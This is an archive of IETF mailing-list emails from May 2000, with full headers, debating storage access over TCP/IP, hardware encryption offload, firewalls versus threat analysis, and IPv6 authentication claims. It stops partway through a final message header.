Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id LAA28909;
Fri, 26 May 2000 11:01:21 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Fri, 26 May 2000 09:40:28 CDT."
<A427D1278F7CD311B1670008C7FAA62AC89F1E@CORPNT3>
Date: Fri, 26 May 2000 11:01:21 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> Encryption will be offloaded to the network interface. ASICs on the NICs
> will greatly improve encryption and authentication performance.
all well and good, provided that this encryption and authentication
are actually compatible with that specified by higher level protocols
and the authentication actually meets the needs of users.
(if your network interface needs to use and verify users' credentials,
as opposed to the host's credentials, it might be a stretch.)
> It won't run over the Internet because of latencies inherent on the
> public network.
at least for some storage applications, latency is not as important
as bandwidth. e.g. you can do backups over a high-latency medium
as long as your bandwidth is adequate (though recovery from write
errors gets a bit tricky).
> It will run over incredibly fast Packet over SONET Wide Area
> Networks--behind firewalls.
I'm sure it will be used behind firewalls in some cases but it's
inappropriate to assume that it will always be used behind firewalls.
Firewalls don't help with the majority of security threats, and
it's less and less the case that network topologies reflect
trust domains.
Keith
>From owner-ietf-outbound Fri May 26 11:20:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA17786
for [EMAIL PROTECTED]; Fri, 26 May 2000 11:20:02 -0400 (EDT)
Received: from corpnt3.born.com (corpnt3.born.com [206.10.207.66])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA17511
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:14:44 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by CORPNT3 with Internet Mail Service (5.5.2650.21)
id <LSP7BT97>; Fri, 26 May 2000 10:14:14 -0500
Message-ID: <A427D1278F7CD311B1670008C7FAA62AC89F1F@CORPNT3>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Fri, 26 May 2000 10:14:03 -0500
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
>> Encryption will be offloaded to the network interface. ASICs on the NICs
>> will greatly improve encryption and authentication performance.
>all well and good, provided that this encryption and authentication
>are actually compatible with that specified by higher level protocols
>and the authentication actually meets the needs of users.
>(if your network interface needs to use and verify users' credentials,
>as opposed to the host's credentials, it might be a stretch.)
A network server will still authenticate user requests. Only the host
needs to be authenticated with the disk/disks.
>> It won't run over the Internet because of latencies inherent on the
>> public network.
>at least for some storage applications, latency is not as important
>as bandwidth. e.g. you can do backups over a high-latency medium
>as long as your bandwidth is adequate (though recovery from write
>errors gets a bit tricky).
Backups could go through VPNs, I suppose. Good point. That would free your
WAN of the backup jobs. I wasn't thinking of backups when I ruled out
the Internet as a disk I/O medium. I suppose infrequently used and low
priority files could also be accessed over the 'net.
>> It will run over incredibly fast Packet over SONET Wide Area
>> Networks--behind firewalls.
>...it's
>inappropriate to assume that it will always be used behind firewalls...
If the larger network that is employing this technology doesn't hire a
decent
consultant, you might be right. If they do, it will ALWAYS be behind a
firewall :-)
>Firewalls don't help with the majority of security threats...
True, but whether the server accesses the disks via SCSI over TCP or SCSI
over
Fibre Channel, the SERVER is still the weak link. The transport protocol
doesn't
create any inherent weaknesses of the type you are refering to--e-mail borne
viruses,
internal hackers, etc. The server would still be the attack point. Why
goodness,
the server and storage devices could be in a VLAN or something to deny
direct hack
attempts against the storage device, but the chink in the armor is how
hardened is
your OS?
Brian
>From owner-ietf-outbound Fri May 26 11:40:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA18443
for [EMAIL PROTECTED]; Fri, 26 May 2000 11:40:03 -0400 (EDT)
Received: from npax.cavebear.com (npax.cavebear.com [192.203.17.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18271
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:33:10 -0400 (EDT)
Received: from localhost (karl@localhost)
by npax.cavebear.com (8.9.3/8.8.7) with ESMTP id IAA28711;
Fri, 26 May 2000 08:32:05 -0700
Date: Fri, 26 May 2000 08:32:05 -0700 (PDT)
From: Karl Auerbach <[EMAIL PROTECTED]>
Reply-To: Karl Auerbach <[EMAIL PROTECTED]>
To: Jon William Toigo <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-Reply-To: <06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
> a. TCP is too CPU intensive and creates too much latency for storage I/O operations.
>
> b. The IP stack is too top heavy and processing packet headers is too
> slow to support storage I/O operations.
There were some papers published duing the late '80's or early '90s by
John Romkey and I belive Dave Clark and Van Jacobson about the length of
instruction sequences to handle TCP. I'm not sure that those ever became
RFCs.
Those papers came up with figures indicating that if one structures code
"correctly" and if the net path is "clean" (i.e. not a lot of packet loss,
reordering, replication, etc) than the per-packet instruction sequences
(sans IP checksum calculation) were potantially very short.
Does anyone have the references to these papers?
--karl--
>From owner-ietf-outbound Fri May 26 11:50:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA18622
for [EMAIL PROTECTED]; Fri, 26 May 2000 11:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18279
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:33:18 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id LAA29358;
Fri, 26 May 2000 11:33:17 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Fri, 26 May 2000 10:14:03 CDT."
<A427D1278F7CD311B1670008C7FAA62AC89F1F@CORPNT3>
Date: Fri, 26 May 2000 11:33:17 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> >> It won't run over the Internet because of latencies inherent on the
> >> public network.
>
> >at least for some storage applications, latency is not as important
> >as bandwidth. e.g. you can do backups over a high-latency medium
> >as long as your bandwidth is adequate (though recovery from write
> >errors gets a bit tricky).
>
> Backups could go through VPNs, I suppose.
except that you can't assume the presence of a VPN either. you need
authenticity and privacy specified as part of the storage access protocol.
> I suppose infrequently used and low
> priority files could also be accessed over the 'net.
yes, but file access protocols are better for this purpose.
I don't see wanting to mount a raw disk drive
across the public Internet very often.
(except perhaps read-only... virtual cdrom, anyone?)
> >> It will run over incredibly fast Packet over SONET Wide Area
> >> Networks--behind firewalls.
>
> >...it's
> >inappropriate to assume that it will always be used behind firewalls...
>
> If the larger network that is employing this technology doesn't hire a
> decent consultant, you might be right. If they do, it will ALWAYS
> be behind a firewall :-)
any consultant who pretends that firewalls provide security cannot
be described as 'decent'.
> >Firewalls don't help with the majority of security threats...
>
> True, but whether the server accesses the disks via SCSI over TCP or SCSI
> over Fibre Channel, the SERVER is still the weak link.
un, no. SCSI has some inherent length/delay/number-of-stations
limitations. but if the disk is accessible using TCP, there is a
significant probability that it will be accessible from the global
Internet and/or from local threats who have physical access to the
transmission medium, and the storage access protocol needs to assume
that this is the case.
> The transport protocol doesn't create any inherent weaknesses of
> the type you are refering to--e-mail borne viruses, internal hackers, etc.
you're assuming a different threat model than I am. I am indeed
assuming that storage devices will be targed, in addition to servers.
> The server would still be the attack point. Why goodness,
> the server and storage devices could be in a VLAN or something to deny
> direct hack attempts against the storage device
yes, they *could* be. but you cannot assume that they *will* be.
> but the chink in the armor is how hardened is your OS?
there's more than one chink in the armor.
IP-based protocols need to be able to work in the global Internet.
Keith
>From owner-ietf-outbound Fri May 26 12:00:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA18886
for [EMAIL PROTECTED]; Fri, 26 May 2000 12:00:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18321
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:35:56 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4QFZt926132;
Fri, 26 May 2000 11:35:55 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Fri, 26 May 2000 10:14:03 CDT."
<A427D1278F7CD311B1670008C7FAA62AC89F1F@CORPNT3>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <A427D1278F7CD311B1670008C7FAA62AC89F1F@CORPNT3>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 26 May 2000 11:35:54 -0400
X-Loop: [EMAIL PROTECTED]
On Fri, 26 May 2000 10:14:03 CDT, [EMAIL PROTECTED] said:
> A network server will still authenticate user requests. Only the host
> needs to be authenticated with the disk/disks.
Hmm.
Isn't this security model the cause of most grumbling regarding NFS security?
> If the larger network that is employing this technology doesn't hire a decent
> consultant, you might be right. If they do, it will ALWAYS be behind a firewall :-)
Double Hmm..
Odd.. I thought we had a clue about security. The guys at SANS just
gave us a 'Technology Leadership Award'. I just walked across the hallway,
and I didn't see any firewall in our router swamp.
I guess because we don't have a firewall, we don't have a clue. Or because
we don't have a firewall, we can't deploy this technology. Somehow, that
doesn't smell right.
> the server and storage devices could be in a VLAN or something to deny direct hack
> attempts against the storage device, but the chink in the armor is how hardened is
> your OS?
If your OS is hardened enough, a firewall may not be appropriate.
"New from Kellogs - Firewalls cereal - part of this *COMPLETE* and *BALANCED*
security breakfast".
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 26 12:10:06 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA19120
for [EMAIL PROTECTED]; Fri, 26 May 2000 12:10:02 -0400 (EDT)
Received: from inner.net (avarice.inner.net [199.33.248.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18736
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:53:57 -0400 (EDT)
Received: from wasp.inet.org ([216.52.8.30])
by inner.net (8.7.6/8.9.3) with ESMTP id PAA05244;
Fri, 26 May 2000 15:45:22 GMT
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Fri, 26 May 2000 11:53:30 +0100
To: [EMAIL PROTECTED]
From: RJ Atkinson <[EMAIL PROTECTED]>
Subject: RE: Storage over Ethernet/IP
Cc: [EMAIL PROTECTED]
In-Reply-To: <A427D1278F7CD311B1670008C7FAA62AC89F1E@CORPNT3>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 15:40 26-05-00 , [EMAIL PROTECTED] wrote:
>It will run over incredibly fast Packet over SONET Wide Area
>Networks--behind firewalls. OC-192 and soon-to-come OC-768 (terrabit)
>switches will be the backbone of WANs and MANs of large networks in a few
>years.
I'll note that at least one vendor has already demonstrated
10 Gig Ethernet switch interfaces at Interop/LV earlier this month.
Such 10 GE boxes are generally much less expensive than OC-192 POS boxes.
Another post indicated that these systems will use frame sizes of 1024 bytes,
which is well within the abilities of any Ethernet interface.
>Also, IPv6 has significantly improved authentication capabilities
>that will help ensure security on the Storage WAN (SWAN?)
IPv6 has NO authentication capability not already shipping for IPv4,
speaking as the person who designed both AH and ESP. Marketing aside,
there is nothing in IPv6 that makes it more easily secured than IPv4.
Both support AH and ESP. Deployed ISAKMP/IKE support IPv4, but might
not support IPv6.
Note that I have no axe to grind for or against IPv6, but the
disinformation campaign that "IPv6 is secure and IPv4 isn't" is
highly annoying and completely wrong.
Ran
[EMAIL PROTECTED]
>From owner-ietf-outbound Fri May 26 12:20:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA19317
for [EMAIL PROTECTED]; Fri, 26 May 2000 12:20:02 -0400 (EDT)
Received: from corpnt3.born.com (corpnt3.born.com [206.10.207.66])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18779
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:56:02 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by CORPNT3 with Internet Mail Service (5.5.2650.21)
id <LSP7B4Q9>; Fri, 26 May 2000 10:55:32 -0500
Message-ID: <A427D1278F7CD311B1670008C7FAA62AC89F20@CORPNT3>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Fri, 26 May 2000 10:55:29 -0500
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
>Odd.. I thought we had a clue about security. The guys at SANS just
>gave us a 'Technology Leadership Award'. I just walked across the hallway,
>and I didn't see any firewall in our router swamp.
>I guess because we don't have a firewall, we don't have a clue. Or because
>we don't have a firewall, we can't deploy this technology. Somehow, that
>doesn't smell right.
>If your OS is hardened enough, a firewall may not be appropriate.
I am not saying that you don't have a clue if you don't utilize a firewall.
I AM saying that if you have Internet access to your network, a firewall is
extremely important. It isn't complete, in and of itself. OS hardening is
still very important, as are other technologies (as necessary to facilitate
application needs).
I understand your point that if your OS is perfectly hardened, then a
firewall
isn't going to add any *extra* protection. You miss the point, though. You
can prevent
unnecessary processor and bandwidth utilization on the server by filtering
it out at the perimeter of your network. You might not get a security
advantage
if you are an OS hardening god, but you would CERTAINLY get performance
increases
on your LAN.
If you are utilizing pure access lists on routers for perimeter security,
then
you are assuming that this technology is as adept at securing a network as
port filters combined with Network Address Translation or cicuit proxying.
Don't
make that assumption.
Brian
>From owner-ietf-outbound Fri May 26 12:30:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA19490
for [EMAIL PROTECTED]; Fri, 26 May 2000 12:30:02 -0400 (EDT)
Received: from corpnt3.born.com (corpnt3.born.com [206.10.207.66])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18839
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:58:02 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by CORPNT3 with Internet Mail Service (5.5.2650.21)
id <LSP7B4R4>; Fri, 26 May 2000 10:57:33 -0500
Message-ID: <A427D1278F7CD311B1670008C7FAA62AC89F21@CORPNT3>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Fri, 26 May 2000 10:57:25 -0500
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
>Experience tells us that although we can design and specify for
>"intra-nets", people will insist on using the results over the public
>internet. Pretending this will not happen is akin to burying ones head in
>the beach sand when one has heard a report of a large wave heading for the
>beach.
Yeah, okay. I will grant that. But, should a good technology be nixed
because some idiots might mis-use it? I personally don't think so.
Brian
>From owner-ietf-outbound Fri May 26 12:40:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA19799
for [EMAIL PROTECTED]; Fri, 26 May 2000 12:40:03 -0400 (EDT)
Received: from corpnt3.born.com (corpnt3.born.com [206.10.207.66])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA18998
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 12:02:05 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by CORPNT3 with Internet Mail Service (5.5.2650.21)
id <LSP7B4TL>; Fri, 26 May 2000 11:01:35 -0500
Message-ID: <A427D1278F7CD311B1670008C7FAA62AC89F22@CORPNT3>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Fri, 26 May 2000 11:01:27 -0500
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
>IPv6 has NO authentication capability not already shipping for IPv4,
>speaking as the person who designed both AH and ESP. Marketing aside,
>there is nothing in IPv6 that makes it more easily secured than IPv4.
>Both support AH and ESP. Deployed ISAKMP/IKE support IPv4, but might
>not support IPv6.
I must admit my error in that statement. I was reciting something that
I had read a year ago. You are correct about AH and ESP
in IPv4 as well as v6. Thanks for the correction.
Brian
>From owner-ietf-outbound Fri May 26 12:50:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA19987
for [EMAIL PROTECTED]; Fri, 26 May 2000 12:50:02 -0400 (EDT)
Received: from mauve.mrochek.com (DSL107-055.brandx.net [209.55.107.55])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA19361
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 12:21:36 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from mauve.mrochek.com by mauve.mrochek.com (PMDF V6.1-1 #35243)
id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Fri,
26 May 2000 09:21:34 -0800 (PST)
Date: Fri, 26 May 2000 09:09:24 -0800 (PST)
Subject: Re: Storage over Ethernet/IP
In-reply-to: "Your message dated Fri, 26 May 2000 11:01:21 -0400"
<[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
Content-type: TEXT/PLAIN; CHARSET=us-ascii
References: <A427D1278F7CD311B1670008C7FAA62AC89F1E@CORPNT3>
X-Loop: [EMAIL PROTECTED]
> > Encryption will be offloaded to the network interface. ASICs on the NICs
> > will greatly improve encryption and authentication performance.
> all well and good, provided that this encryption and authentication
> are actually compatible with that specified by higher level protocols
> and the authentication actually meets the needs of users.
> (if your network interface needs to use and verify users' credentials,
> as opposed to the host's credentials, it might be a stretch.)
FWIW, it has been tried, and it didn't succeed in the market, although whether
that was a matter of timing, insufficient market push, or no market existing
isn't clear.
Specifically, Digital used to make a little gadget called a Cryptonette that
you inserted into your Ethernet cable that did this. (The chip inside was
something called a TANDU, and had DES and two Ethernet ports built in. The
whole thing was the size of a pack of cards.)
And I believe there were at least two other similar gadgets at some point,
although I cannot recall their names...
The demo I saw had the boxes doing IPSEC-style operations (this was before
IPSEC was standardized), with the credential verification being done on the
host side.
OTOH, at least one of the problems with these sorts of things is that it's hard
to change the cryptography embedded in them. So, while I think hardware
cryptographic acceleration of this sort could be quite useful, I'm skeptical
that it will ever be something that is universally deployed.
> > It won't run over the Internet because of latencies inherent on the
> > public network.
> at least for some storage applications, latency is not as important
> as bandwidth. e.g. you can do backups over a high-latency medium
> as long as your bandwidth is adequate (though recovery from write
> errors gets a bit tricky).
Yep. Backups done over the public Internet (usually with an appalling lack of
security, alas) are actually quite common.
Ned
>From owner-ietf-outbound Fri May 26 13:00:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA20234
for [EMAIL PROTECTED]; Fri, 26 May 2000 13:00:03 -0400 (EDT)
Received: from mail.cic.tsinghua.edu.cn (mail.cic.tsinghua.edu.cn [166.111.4.11])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA19724
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 12:37:49 -0400 (EDT)
Received: from a ([166.111.180.27])
by mail.cic.tsinghua.edu.cn (8.8.7/8.8.7) with SMTP id BAA15318;
Sat, 27 May 2000 01:41:59 +0900 (CDT)
Message-Id: <[EMAIL PROTECTED]>
Date: Sat, 27 May 2000 0:40:57 +0800
From: qtl <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
CC: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Subject: wave wrapper!
X-mailer: FoxMail 3.0 beta 2 [cn]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi:
How about digital wrapper(wave wrapper?) now?I want to know it!
Where can I find the document about it?
Thank you!
>From owner-ietf-outbound Fri May 26 13:10:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA20510
for [EMAIL PROTECTED]; Fri, 26 May 2000 13:10:03 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA20007
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 12:51:02 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id KAA14147
for [EMAIL PROTECTED] env-from <vjs>;
Fri, 26 May 2000 10:51:03 -0600 (MDT)
Date: Fri, 26 May 2000 10:51:03 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
X-Loop: [EMAIL PROTECTED]
> Yeah, okay. I will grant that. But, should a good technology be nixed
> because some idiots might mis-use it? I personally don't think so.
This thread started with a question about a TCP technology report, and
wandered into firewall and general security technologies. Which is the
good technology that is likely to be misused?
.....
It has been at least 10 years since the word "technology" came to mean
"post process male bovine grass and grain." Whenever someone uses a form
of the T-word, make the appropriate substitution and notice that the user's
intended meaning is far clearer, albeit sometimes more clear than the user
desired.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Fri May 26 13:40:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA21151
for [EMAIL PROTECTED]; Fri, 26 May 2000 13:40:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA20965
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 13:31:45 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id NAA01178;
Fri, 26 May 2000 13:31:43 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Fri, 26 May 2000 10:57:25 CDT."
<A427D1278F7CD311B1670008C7FAA62AC89F21@CORPNT3>
Date: Fri, 26 May 2000 13:31:43 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> But, should a good technology be nixed because some idiots might mis-use it?
no. but an Internet protocol for accessing storage devices needs to be
able to operate in the Internet.
Keith
p.s. You might as well ask "is an insecure technology for accessing storage
devices a good thing, given that there are large numbers of idiots out
there who assume that firewalls provide adequate security?"
>From owner-ietf-outbound Fri May 26 13:50:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA21367
for [EMAIL PROTECTED]; Fri, 26 May 2000 13:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA21008
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 13:34:19 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id NAA01216;
Fri, 26 May 2000 13:34:17 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Fri, 26 May 2000 10:55:29 CDT."
<A427D1278F7CD311B1670008C7FAA62AC89F20@CORPNT3>
Date: Fri, 26 May 2000 13:34:17 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> I AM saying that if you have Internet access to your network, a firewall is
> extremely important.
and you're wrong. a firewall is just a tool for reducing the difficulty
of your threat analysis. it doesn't inherently make your network more
secure. what makes your network secure (to the extent that it is)
is the the fact that you have done the threat analysis and blocked the
holes that you've identified through that analysis. a firewall can
make the job easier by reducing the number of cases that you have to
consider, but it does not make your network secure. what's more, you
can often do this job better without a firewall than with one, because
firewalls can acutally cause security holes that didn't exist before.
Keith
>From owner-ietf-outbound Fri May 26 14:00:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA21633
for [EMAIL PROTECTED]; Fri, 26 May 2000 14:00:03 -0400 (EDT)
Received: from castillo.torrentnet.com (castillo.torrentnet.com [4.18.161.34])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA21595
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 13:58:40 -0400 (EDT)
Received: from castillo.torrentnet.com (localhost.torrentnet.com [127.0.0.1])
by castillo.torrentnet.com (8.9.3/8.9.3) with ESMTP id NAA15896;
Fri, 26 May 2000 13:58:34 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.0.2 2/24/98
To: Karl Auerbach <[EMAIL PROTECTED]>
cc: Jon William Toigo <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Fri, 26 May 2000 08:32:05 PDT."
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 26 May 2000 13:58:33 -0400
From: Steve Blake <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> There were some papers published duing the late '80's or early '90s by
> John Romkey and I belive Dave Clark and Van Jacobson about the length of
> instruction sequences to handle TCP. I'm not sure that those ever became
> RFCs.
>
> Those papers came up with figures indicating that if one structures code
> "correctly" and if the net path is "clean" (i.e. not a lot of packet loss,
> reordering, replication, etc) than the per-packet instruction sequences
> (sans IP checksum calculation) were potantially very short.
>
> Does anyone have the references to these papers?
David D. Clark, Van Jacobson, John Romkey, and Howard Salwen, "An Analysis
of TCP Processing Overhead", IEEE Communications, vol. 27, no. 6, June 1989,
pp. 23 - 29.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Steven L. Blake <[EMAIL PROTECTED]>
Ericsson IP Infrastructure (919)472-9913
>From owner-ietf-outbound Fri May 26 14:20:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA22240
for [EMAIL PROTECTED]; Fri, 26 May 2000 14:20:02 -0400 (EDT)
Received: from rgfsparc.cr.usgs.gov (rgfsparc.cr.usgs.gov [136.177.164.192])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA22167
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 14:17:43 -0400 (EDT)
Received: from rgfsparc.cr.usgs.gov (rgfsparc.cr.usgs.gov [136.177.164.192])
by rgfsparc.cr.usgs.gov (8.9.3+Sun/8.9.1) with SMTP id NAA00209
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 13:15:56 -0500 (CDT)
Message-Id: <[EMAIL PROTECTED]>
Date: Fri, 26 May 2000 13:15:56 -0500 (CDT)
From: "Robert G. Ferrell" <[EMAIL PROTECTED]>
Reply-To: "Robert G. Ferrell" <[EMAIL PROTECTED]>
Subject: Re: Storage over Ethernet/IP
To: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-MD5: ulBH/sPvL4cs0K4hqb2KRw==
X-Mailer: dtmail 1.3.0 CDE Version 1.3 SunOS 5.7 sun4u sparc
X-Loop: [EMAIL PROTECTED]
>If your OS is hardened enough, a firewall may not be appropriate.
>
>"New from Kellogs - Firewalls cereal - part of this *COMPLETE* and *BALANCED*
>security breakfast".
Given the recent revelations about Gauntlet, perhaps firewalls aren't quite
the invincible bastions of unassailability they appear, as well.
RGF
Robert G. Ferrell, CISSP
Information Systems Security Officer
National Business Center, US DoI
[EMAIL PROTECTED]
------------------------------------------------------------
Nothing I have ever said should be construed as even vaguely
representing an official statement by the NBC or DoI.
------------------------------------------------------------
>From owner-ietf-outbound Fri May 26 15:30:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA23467
for [EMAIL PROTECTED]; Fri, 26 May 2000 15:30:02 -0400 (EDT)
Received: from mail-out1.apple.com (mail-out1.apple.com [17.254.0.52])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA23375;
Fri, 26 May 2000 15:24:53 -0400 (EDT)
Received: from mailgate1.apple.com (A17-128-100-225.apple.com [17.128.100.225])
